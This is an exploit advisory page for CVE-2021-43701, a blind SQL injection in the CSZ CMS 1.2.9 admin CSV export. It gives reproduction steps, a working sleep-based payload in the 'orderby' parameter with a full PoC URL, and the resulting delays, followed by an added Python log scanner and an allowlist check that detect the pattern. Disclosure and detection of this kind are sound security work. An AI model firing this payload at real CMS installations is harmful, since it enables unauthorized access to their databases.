packetstorm · Rahad Chowdhury · PACKETSTORM:166535
Mar 30, 2022 - 12:00 a.m.

CSZ CMS 1.2.9 SQL Injection

packetstormsecurity.com
csz cms
blind sql injection
csv export
burp suite
proof of concept
cve-2021-43701
admin panel
apache 2.4.46
php 7.4.16
windows 10
kali linux

EPSS

0.04

Percentile

92.2%

`# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQL Injection (Authenticated)  
# Date: 2021-04-14  
# Exploit Author: Rahad Chowdhury  
# Vendor Homepage: https://www.cszcms.com/  
# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip  
# Version: 1.2.9  
# Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46  
# CVE: CVE-2021-43701  
  
*Steps to Reproduce:*  
1. Log in to the Admin Panel.  
2. Go to "General Menu > CSV Export / Import".  
3. Open Burp Suite and configure the browser to proxy through it.  
4. Select any "Table Name", then choose values for "Fields Select" and "Sort by".  
5. Click "Export to CSV" and intercept the request with Burp Suite.  
6. The "fieldS[]" or "orderby" parameter is vulnerable. To test for blind SQL injection, send the query "(select(0)from(select(sleep(10)))a)" in the "orderby" parameter.  
  
*Proof of Concept:*  
http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV  
  
*Output:*  
With sleep(0), the response is delayed by 0 seconds.  
With sleep(1), the response is delayed by 1 second.  
With sleep(5), the response is delayed by 5 seconds.  
With sleep(10), the response is delayed by 10 seconds.  
`
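
A defender-side check for the request pattern in the advisory, as an added example (not part of the original advisory or of CSZ CMS): it scans web server access log lines for CSV export requests whose `fieldS[]` or `orderby` values are not plain column identifiers. The endpoint path and parameter names come from the PoC URL; the log lines are constructed, and the log format and the identifier rule are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint path and parameter names come from the advisory's PoC URL.
EXPORT_PATH = re.compile(r"/admin/export/getcsv/[^/]+$")
CHECKED_PARAMS = ("fieldS[]", "orderby")
# Assumption: legitimate column names are plain SQL identifiers.
IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
# Pulls the request target out of a common/combined log format line.
REQUEST = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Mar/2022:10:00:01 +0000] "GET /CSZCMS/admin/export/getcsv/'
    'article_db?fieldS%5B%5D=article_db_id&orderby=title&sort=ASC HTTP/1.1" 200 5120',
    '192.0.2.10 - - [30/Mar/2022:10:00:09 +0000] "GET /CSZCMS/admin/export/getcsv/'
    'article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)'
    '&sort=ASC&submit=Export+to+CSV HTTP/1.1" 200 0',
    '192.0.2.77 - - [30/Mar/2022:10:01:00 +0000] "GET /CSZCMS/admin/login HTTP/1.1" 200 900',
]


def check_export_request(target):
    """Return non-identifier (parameter, value) pairs, or None if not an export request."""
    parts = urlsplit(target)
    if not EXPORT_PATH.search(parts.path):
        return None
    # parse_qs percent-decodes names too, so fieldS%5B%5D becomes fieldS[].
    params = parse_qs(parts.query, keep_blank_values=True)
    return [(name, value) for name in CHECKED_PARAMS
            for value in params.get(name, [])
            if not IDENTIFIER.fullmatch(value)]


def scan_access_log(lines):
    """Return [(line_number, findings)] for export requests with suspect values."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        findings = check_export_request(match.group("target")) if match else None
        if findings:
            hits.append((number, findings))
    return hits


if __name__ == "__main__":
    for number, findings in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: non-identifier value in {findings}")
```

The same identifier allowlist, applied server-side before the export query is built, rejects these values outright instead of only logging them.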
